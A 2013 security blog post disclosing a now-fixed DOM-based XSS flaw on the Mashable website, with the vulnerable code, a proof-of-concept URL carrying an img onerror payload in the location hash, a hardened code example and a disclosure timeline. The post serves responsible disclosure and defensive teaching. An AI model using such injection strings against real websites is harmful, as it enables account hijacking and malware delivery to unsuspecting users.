Tuesday, September 3, 2013

Mashable DOM XSS

Recently I found a security issue on the Mashable website.
The vulnerable code was:
(...)
var customOpts = optsFromUrl(window.location.hash);
(...)
src = appendKeyVal(src, 'ord',      opts.options);
(...)
buffer += '<script class="ad_call" src="' + src + '"><\/script>';
(...)
document.write(buffer);
(...)
The source, location.hash, wasn't properly sanitized, so it could be used to inject an XSS vector into the browser DOM through the document.write sink.

Proof-of-concept:
http://mashable.com/#type=left_column&ord=499753815940197_"><img src=x onerror=prompt(1);>&tile=1&sec0=home&sec1=index&escnotcategory=iframe&bg=#39ebd1&adnum=1

This type of attack could be used to trick innocent users, infect them with malware and even hijack their accounts.
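
One way to close the source-to-sink path described above, as an added example that is neither Mashable's actual fix nor code from the site: values read from location.hash are allowlisted, percent-encoded before being appended, and the script element is created through the DOM API instead of document.write. The names optsFromUrl and appendKeyVal come from the excerpt, but their bodies, the allowlist patterns, the ';' separator, buildAdSrc, insertAdScript and the AD_BASE placeholder URL are assumptions.

```javascript
// Added example: hardened handling of location.hash values.
// Function bodies, ALLOWED patterns and AD_BASE are assumptions, not site code.
const AD_BASE = 'https://ads.example.invalid/adj'; // placeholder URL

// Allowlist: key -> pattern the decoded value must match in full.
const ALLOWED = {
  type: /^[a-z_]{1,32}$/,
  ord: /^[0-9_]{1,32}$/,
  tile: /^[0-9]{1,3}$/,
  adnum: /^[0-9]{1,3}$/,
};

// Parse "#k=v&k=v" and keep only allowlisted keys with well-formed values.
function optsFromUrl(hash) {
  const opts = {};
  for (const pair of String(hash).replace(/^#/, '').split('&')) {
    const i = pair.indexOf('=');
    if (i < 1) continue; // no key or no '='
    const key = pair.slice(0, i);
    let val;
    try { val = decodeURIComponent(pair.slice(i + 1)); } catch (e) { continue; }
    const known = Object.prototype.hasOwnProperty.call(ALLOWED, key);
    if (known && ALLOWED[key].test(val)) opts[key] = val;
  }
  return opts;
}

// Append key=value (';' separator assumed), percent-encoding both parts so
// no quote or angle bracket can reach the attribute value.
function appendKeyVal(src, key, val) {
  return src + ';' + encodeURIComponent(key) + '=' + encodeURIComponent(val);
}

// Build the ad script URL from validated options only.
function buildAdSrc(hash) {
  const opts = optsFromUrl(hash);
  return Object.keys(opts).reduce((s, k) => appendKeyVal(s, k, opts[k]), AD_BASE);
}

// Browser only: build the element with the DOM API instead of document.write.
function insertAdScript(hash) {
  const el = document.createElement('script');
  el.className = 'ad_call';
  el.src = buildAdSrc(hash); // set as a property, never parsed as HTML
  document.head.appendChild(el);
}
```

With the hash from the proof-of-concept, the ord value fails its pattern and is dropped, so the resulting URL contains only the validated type, tile and adnum parameters.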

Timeline:
22 Aug 2013: Reported to Mashable
26 Aug 2013: Mashable replied that they will fix it
29 Aug 2013: Fix is released
03 Sep 2013: Full disclosure
